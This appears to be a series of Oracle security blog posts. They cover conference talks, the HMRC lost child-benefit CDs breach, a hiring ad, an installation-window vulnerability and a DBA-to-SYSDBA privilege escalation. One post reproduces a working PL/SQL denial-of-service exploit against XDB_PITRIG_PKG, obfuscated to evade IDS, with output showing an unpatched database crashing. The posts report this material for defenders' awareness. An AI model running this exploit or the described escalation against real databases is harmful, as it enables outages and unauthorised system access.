Pete Finnigan's Oracle Security Weblog

I thought when i started my own company again I would have had time to spedn updating my website and posting to my blog at least under the guise of marketing; so far no such luck. I am very busy with work, also with my new traing courses and also i have spent every late evening spare hour recently completing my presentations for the UKOUG conference in one weeks time. Details for my presentations; Oracle forensics, Oracle security tools, an Oracle security round table and also a two hour Oracle security master class are available on my home page. I have posted the slides for the masterclass, the security tools and the round table to the UKOUG. I will complete the Oracle forensics paper tomorrow evening I hope. I am really looking forward to the conference this year and catching up with lots of people. I am going down on the train from York every day this year to Birmingham to avoid the hideous experience I had with a bad hotel last year. I booked the tickets a long time ago and its really good value compared to a hotel and i am planning to get some work done on the train as well.

I have also a number of presentations coming up in the new year. I have just been asked to speak at the UNIX SIG in january about real world use of VPD, so that should be fun. I am also going to speak at a white-hats event in March, not sure of the exact title yet.

I have quite a back log of stuff to talk about here that hopefully i will get around to once the presentation writing phase is over. I also have some research topics planned and also some updated needed for the site to described and add srevices, partnerships and more; for the business thats more important so will get done fisrt.

OK. Some Oracle security, I found a new paper by Sean Hull the other day called Eight Ways to Hack Oracle. This is a good summary of some of the key problems with security in Oracle databases.

I also just downloaded a pdf of a new Oracle security book from syngress; I have only skimmed it so far. I will give some comments here later in the week on that.

To say i was shocked is an understatement. I was completely gob-smacked that a UK government agency can spend (presumably) millions of our IT pounds storing and using our personal data and then proceed to take it out of its secure IT centers and take it away from the application protections, audit trails and procedures and put the data onto CD's (All of our personal data) and post it to the National Audit Office. To say its the fault of a junior member of staff may be true in literal sense but presumably someone asked him to send this data to the NAO? - he would not have just decided to do it all on his own. Also why is a junior member of staff allowed to access all of the data and why is he allowed to download it from the HMRC systems and put it onto CD's?. The fact that this was done and seems to be a planned action points at support people who have high levels of access.

The BBC has a nice timeline of events in a page - Lost CD's - Sequence of events and also a write up of the events in a story Brown apologises for records loss".

I personally am angry as my children get child benefit along with almost all other children in the UK, now my details that i entrusted to the government are floating around an office, post office or who knows where waiting for someone to get at them.

The timeline above is amazing. It states that the first set of two disks with password protected records - (what is used? - MS Excel Password, Winzip, what?) went missing and when they package failed to arrive they sent a second one. This is in addition to the record that a juior official (doesnt say if its the same one?) sent a full copy of HMRC child benefit data to the NAO, it goes on to say that that data is returned. Does this mean the CD's were posted back? - if so how do we know that the data was wiped from everywhere it was written to at the NAO?

To download all of this data once and write it to CD's is bad, but to do it again and again is crazy. How does a junior official get access to a system to download all the personal details and to then write them to CD in the fisrt place?

The moral of this story? - database security is complex, its complicated to design, implement, to harden existing systems and more but the data has no security at all if you take it from the databases and away from the RBAC, the audit trails, the procedures and write it to CD or disc or any other medium. it bypasses the security completely.

I have to ask another question. If this action had not gone wrong and the CD's had arrived, presumably someone in the NAO, loaded the data onto other systems, who controls the CD's, where would they be kept, would they be destroyed, what about the data on the NAO analysts machines, how is that protected - MS Excel password?, how long is it kept, how is it destroyed?

There are so many questions, this is why database security is so important, our personal details, NINO, bank accounts, names, childrens names and more? should be held in secure databases and audited, protected with strong RBAC, accessed by authenticated and authorised users only and much more, my data and that of every other parent in the UK should not be taken from the secure database and applications and sent to anyone on a CD. There is no security whatsoever on a CD that is password protected.

As i said - Gob-smacked!!!

Due to unprecedented success in our company since I re-started it last August ( see Pete Finnigan is now an independent and available for Oracle security work ) we are looking to hire someone to help me deliver Oracle Security consultancy, training, products and associated services.

I am looking for someone with energy and excitement for database security, someone who knows Oracle database technology well already. You don't need to be a DBA or a developer but you must understand the complete architecture and how the products tick. This is important; let me give an example; to provide security services its not enough to simply tick the boxes and check parameters, you need to understand how those parameters affect the database, the applications running on them, why do you need to know? - Because every installation is different and every application working with the database is different. So you find a parameter that’s not set to a secure value, in some cases its not a simple case of setting it to its known secure value, this has been known to break applications (lets not get into the whys and wherefores of whether that’s good design or bad!) so you need to know how Oracle works so that alternate mitigating counter-measures can be suggested, designed and deployed as well for the best solutions for our customers.

I am looking for someone who knows Oracle well; but also someone who knows security and understands security ideally in the Oracle database environment. Secondary to this is the need to understand the security features provided by the Oracle database product set.

The job will also include the opportunity to write papers for speaking events, writing for this blog; therefore writing skills are important but for me the more important thing is passion for learning and passion for what we are doing and I am willing to train and bring up to speed the right person.

The job will also entail all types of Oracle security based consultancy; security audits, design work, specialist work around things like VPD, OLS, ASO, design of audit trails, Oracle database breach investigations and much more. It will also involve pre-sales, proposal writing, teaching and products.

Ideally I am looking for someone based in the north of England but don't let this limit you, I am not asking you to move house as the business we have is very spread out and we need to go where the client is but being closer to our base would make communications easier.

You must already have the right to work in the UK; in the future we may relax this but at the moment we cannot afford the efforts to help with business visa's etc to bring anyone in from abroad.

I believe that this is a great opportunity for someone out there, all you need to do is email me on pete _at_ petefinnigan _dot_ com with your CV and we can arrange a first interview.

Please no agencies, you will be wasting your time as well as mine as I will not respond to any agencies, I want to talk to individuals directly.

David has been busy. He posted a vulnerability he has found in 10gR2 and 11gR1 during the week to the bugtraq security mailing list. The post is titled Oracle 11g/10g Installation Vulnerability. This is an interesting issue that is time based. David found that the database has the default passwords for SYS and SYSTEM for a short period until later in the install when they are changed to the chosen values. The time window available is based on the features chosen. David mentions some times in his blog but these are meaningless really as they are on his machine / OS / database feature combinations. Of course everyones hardware / software setups are different but there is still an issue as the database could be compromised during an installation. What David doesnt mention is why? - My guess from this description without testing (I dont have enough time to do an install, too much work to do, hence not much blogging recently!) is that this occurs when you choose a seed database. This would be logical and would explain how the users could have their defaults. I have always recommended to all clients that they don't use the DBCA and instead create a database from first principals using the create database command. This presumably would not have this issue.

In looking at Davids post I noticed another entry in his blog titled Database Tripwires.... This has the same mix up between fine grained audit and fine grained access control as the Oracle Hackers handbook, I guess this time its a slip up..:-). The interesting idea is in the next paragraph below that one that suggests the use of a view that calls a function to use it as a select trigger. If you set up a function that does the work of a trigger - i.e. records something or sends a message and then ensure that the function is called every time a view is selected from then this simulates a select trigger. I like this idea.

Finally David sent me an advanced copy of his database survey earlier in the week that shows how many databases are exposed directly to the internet. This is a very interesting paper and shows that the numbers are up overall from the first survey done 2 years ago, this is a bad trend i guess, the number of databases (SQL and Oracle) exposed to the internet without a firewall is growing. The paper shows that the number of Oracle servers has dropped and the increase therefore SQL Server has taken the brunt of the increase. Why? maybe because of the proliferation of free SQL Server installs on desktops? - maybe because Visual Express also gives away SQL Server, maybe because Microsoft have updated their free database, whereas Oracle have not. Robert McMillan also has seen a copy of David's paper and hase written about it in a new item called Researcher: Half a million database servers have no firewall - Two years after first Database Exposure Survey, the situation's worse than ever. David should release the paper on his database security web site.

Tanel Poder has made an excellent post to his blog titled Oracle Security: All your DBAs are SYSDBAs and can have full OS access. This post details Tanel's recent discovery that a user who has the DBA role or IMP_FULL_DATABASE can become a SYSDBA and access the operating system, alter audit trails, alter the Oracle binary after setting _disable_image_check = true or also be able to set a dedicated server process to run as SYSDBA through the debugger by flipping the bit that signifies that the process is running as a SYSDBA one. This is all based on the BECOME USER privilege that I have spoken about on this site in the past. A UPI call is available from the client side to utilize the BECOME USER priviege used by import or the Oracle data pump to change users. A new package KUPP$PROC.CHANGE_USER can also be used to change users and use the BECOME USER privilege.

Tanels post shows how someone with BECOME USER and CREATE SESSION could change schemas/user to SYS and grant DBA. Unfortunately this does not give you the right to grant SYSDBA but Tanel has a great way to do that, he uses ALTER SESSION to change the _oradbg_pathname hidden parameter to a command to flip the SYSDBA bit in the PGA for a dedicated server process and then uses the debug event to run it. He can then grant SYSDBA to another user, shutdown the database or more. Tanel provides examples for Solaris with mdb and Linux with gdb.

Nice post, very detailed and very internal and clever.

I talked yesterday at the UKOUG DBMS SIG in Chesford Grange (Le Meridien Warwick) which is very close to Warwick. The conference was very good in my opinion with lots of interaction and good discussion. I also particularly liked Julian's talk abotu investigating Oracle, very interesting particulary the hint at the special C SGA programs he uses to investigate the SGA. My own presentation was about Oracle 11g Security and whats new in 11g, whats worse, whats subtly changed and also particularly how Oracle have made great strides in improving the features to solve some of the key issues once and forall.

My paper has been added to my Oracle Security white papers page as two versions. Both are pdf and one is one slide per page and the other has 6 slides per page. The Oracle 11g Security paper is here (full, 1.2 Meg) and the Oracle 11g Security paper (6 slides per page - 240K) version is here.

Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No versions were given as to which are vulnerable but Alex posted in his blog that unpatched 10.2.0.1 and 10.2.0.2 systems are affected and crash. I tested this on an unpatched 10.2.0.1 database:

SQL> grant create session to x identified by x; Grant succeeded. SQL> connect x/x Connected. SQL> edit Wrote file afiedt.buf 1 -- Utility to free Oracle memory 2 declare 3 larry varchar2(32767); 4 mary varchar2(32767); 5 begin 6 larry:='larryellison'; 7 larry:=larry||larry; 8 larry:=larry||larry; 9 larry:=larry||larry; 10 larry:=larry||larry; 11 larry:=larry||larry; 12 larry:=larry||larry; 13 larry:=larry||larry; 14 mary:='maryann'; 15 mary:=mary||mary; 16 mary:=mary||mary; 17 mary:=mary||mary; 18 mary:=mary||mary; 19 mary:=mary||mary; 20 mary:=mary||mary; 21 mary:=mary||mary; 22 mary:=mary||mary; 23 xDb 24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary 25 , larry); 26* end; SQL> / declare * ERROR at line 2: ORA-03135: connection lost contact SQL> connect system/manager ERROR: ORA-12514: TNS:listener does not currently know of service requested in connect descriptor SQL> connect system/manager Connected. SQL>

As you can see running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:



The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes and also embedded comments to throw off IDS and IPS software that use simple rules to detect this type of attack.

I will be off down to Chesford Grange (Le Meridien Warwick) tomorrow to speak at the UKOUG DBMS SIG with a paper titled http://www.ukoug.org/calendar/show_presentation.jsp?id=7971 - (broken link) Oracle11g Security Features that will overview the main new security features in Oracle 11g as well as look at some of the key security problems affecting Oracle databases and how 11g has made great progress to address some of these. I will also touch upon some of the things that haven't been documented but are still security improvements as well as show some detailed examples of some of the features such as password related issues, the new fine grained network controls for packages and more. I will post the slides up after the event on this site. If anyone is able to come down there tomorrow come and say hello!.

I saw that David had made a couple of good posts to his blog in the last couple of days. The first is about the hidden parameter _dbms_sql_security_level being added to help control the use of the DBMS_SQL package and also to prevent cursor injection or cursor snarfing by adding security levels, checking effective and actual user IDs and also now generating random cursor ID's to prevent prediction. These are great improvements to this area that effectively closes out a major security hole. David's blog is titled Oracle 11g DBMS_SQL Security Changes.

David's second interesting post is titled 0wned by the lowly Oracle rowid pseudo function? and discusses the use of the ROWID function to predict information that is there but is perhaps not visible because of the use of VPD. This could undermine VPD in some circumstances but would require predictable other data to enable someone with SQL access to use the ROWID function to predict missing records. What is intersting about this post is that it uses the same method I suggested around 4 years ago but from another angle. I used it in Oracle forensics to show how a deleted record from SYS.AUD$ could be identified and also how altered records showed up in the same table when comparing the ROWID and also the timestamps.